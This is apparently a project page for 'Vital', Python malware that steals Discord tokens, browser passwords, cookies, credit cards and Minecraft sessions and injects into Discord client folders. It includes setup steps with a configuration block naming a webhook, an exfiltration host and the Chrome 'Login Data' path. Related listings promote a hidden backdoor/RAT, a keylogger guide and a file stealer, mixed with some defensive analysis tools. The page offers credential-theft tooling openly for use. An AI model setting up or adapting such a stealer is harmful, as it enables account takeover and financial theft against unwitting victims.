Malware for Discord, designed to steal passwords, tokens, and inject discord folders for long-term use.

Overview

Vital

  • What is Vital?

    Vital is malware primarily used to collect and extract information from the Discord desktop client. While it has other features (MC stealer, browser tools) it really shines in this area.

  • Overview of Vital

    Vital has the ability to steal browser passwords, cookies, and credit cards. It also collects Discord tokens, Minecraft client cookies and can redirect the Discord client to an alternative web address.

  • Support / coverage

    Vital supports a plethora of Discord clients and browsers, from commonly used browsers such as Chrome and Firefox to lesser used browsers such as (i don't know)

Usage

Setup a webserver on either a local machine or a remote machine, hosting the PHP file. Once you have your local server setup, make sure to configure everything properly inside of main.py.

  • Example
WEBHOOK 	    = 	'https://discord.com/webhooks/idontfuckingknow'
REDIRECT 	    = 	''
HOST	 	    = 	'http://mydomain.org/'
CHROME_DATA 	    =   '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data'
USERNAME	    =   os.environ.get('USERNAME')
APPDATA		    =   os.getenv('APPDATA')

DEBUG 		    = 	False

After this you can execute main.py and watch the magic happen!

You might also like...
Backdoor is a term that refers to the access of the software or hardware of a computer system without being detected.
Backdoor is a term that refers to the access of the software or hardware of a computer system without being detected.

This program is an non-object oriented opensource, hidden and undetectable backdoor/reverse shell/RAT for Windows made in Python 3 which contains many features such as multi-client support and cross-platform server.

A small utility to deal with malware embedded hashes.
A small utility to deal with malware embedded hashes.

Uchihash is a small utility that can save malware analysts the time of dealing with embedded hash values used for various things such as: Dyn

Android Malware Behavior Deleter
Android Malware Behavior Deleter

Android Malware Behavior Deleter UDcide UDcide is a tool that provides alternative way to deal with Android malware. We help you to detect and remove

A Feature Rich Modular Malware Configuration Extraction Utility for MalDuck
A Feature Rich Modular Malware Configuration Extraction Utility for MalDuck

Malware Configuration Extractor A Malware Configuration Extraction Tool and Modules for MalDuck This project is FREE as in FREE 🍺 , use it commercial

This repository is one of a few malware collections on the GitHub.
This repository is one of a few malware collections on the GitHub.

This repository is one of a few malware collections on the GitHub.

An IDA pro python script to decrypt Qbot malware string
An IDA pro python script to decrypt Qbot malware string

Qbot-Strings-Decrypter An IDA pro python script to decrypt Qbot malware strings.

Android Malware (Analysis | Scoring) System
Android Malware (Analysis | Scoring) System

An Obfuscation-Neglect Android Malware Scoring System Quark-Engine is also bundled with Kali Linux, BlackArch. A trust-worthy, practical tool that's r

A guide to building basic malware in Python by implementing a keylogger application
A guide to building basic malware in Python by implementing a keylogger application

Keylogger-Malware-Project A guide to building basic malware in Python by implementing a keylogger application. If you want even more detail on the Pro

Detection tool of malware(s) by checksum (useful for forensic)

🐍 malware_checker.py Detection tool of malware(s) by checksum (useful for forensic) 📦 Dependencies installation $ pip3 install -r requirements.txt

Comments
  • Code cleanup #0001

    Code cleanup #0001

    Cleaned up some code, I would like for you to test it and see if it works for you / is to your liking.

    • Did some things such as
    - Added more comments
    - Renamed variables
    - Got rid of single use objects
    - Got rid of useless functions
    - Removed some variables that were never even used
    

    Best of luck, 0x44F

    opened by 0x44F 0
  • Fatal exception

    Fatal exception

    Fatal error: Uncaught Error: Function name must be a string in /home/runner/WelllitNoxiousLava/functions.php:12 Stack trace: #0 /home/runner/WelllitNoxiousLava/index.php(13): randomString('0123456789abcde...', 7) #1 {main} thrown in /home/runner/WelllitNoxiousLava/functions.php on line 12 please help

    opened by sudocpMATHdotPY 0
Owner
HellSec
Student at LATTC, Currently teaching myself C and Go-Lang.
HellSec
This project is all about building an amazing application that will help users manage their passwords and even generate new passwords for them

An amazing application that will help us manage our passwords and even generate new passwords for us.

null 1 Jan 23, 2022
Steal Files on a Windows Machine

File-Stealer Steal Files on a Windows Machine About This Script will steal certain Files on a Windows Machine and sends them to a FTP Server. Preview

Marcel 5 Nov 17, 2022
Midas ELF64 Injector is a tool that will help you inject a C program from source code into an ELF64 binary.

Midas ELF64 Injector Description Midas ELF64 Injector is a tool that will help you inject a C program from source code into an ELF64 binary. All you n

midas 20 Dec 24, 2022
This is an injection tool that can inject any xposed modules apk into the debug android app

This is an injection tool that can inject any xposed modules apk into the debug android app, the native code in the xposed module can also be injected.

Windy 32 Nov 5, 2022
Discord Token Stealer Malware Protection

TokenGuard TokenGuard, protect your account, prevent token steal. Totally free and open source Discord Server: https://discord.gg/EmwfaGuBE8 Source Co

null 10 Nov 23, 2022
A token logger for discord + steals Brave/Chrome passwords and usernames

Backdoor Machine - ❗ For educational purposes only ❗ A program made in python for stealing passwords and usernames from Google Chrome/Brave and tokenl

null 36 Jul 18, 2021
A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance

A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance

null 11 Nov 15, 2022
Malware Configuration And Payload Extraction

CAPEv2 (Python3) has now been released CAPEv2 With the imminent end-of-life for Python 2 (January 1 2020), CAPEv1 will be phased out. Please upgrade t

Context Information Security 701 Dec 27, 2022
Malware Configuration And Payload Extraction

CAPE: Malware Configuration And Payload Extraction CAPE is a malware sandbox. It is derived from Cuckoo and is designed to automate the process of mal

Kevin O'Reilly 1k Dec 30, 2022
A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms

A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms. Change the Blackgound image of targets' computer. and decrypt the targets' encrypted files in our own computer

Li Ka Lok 2 Dec 2, 2022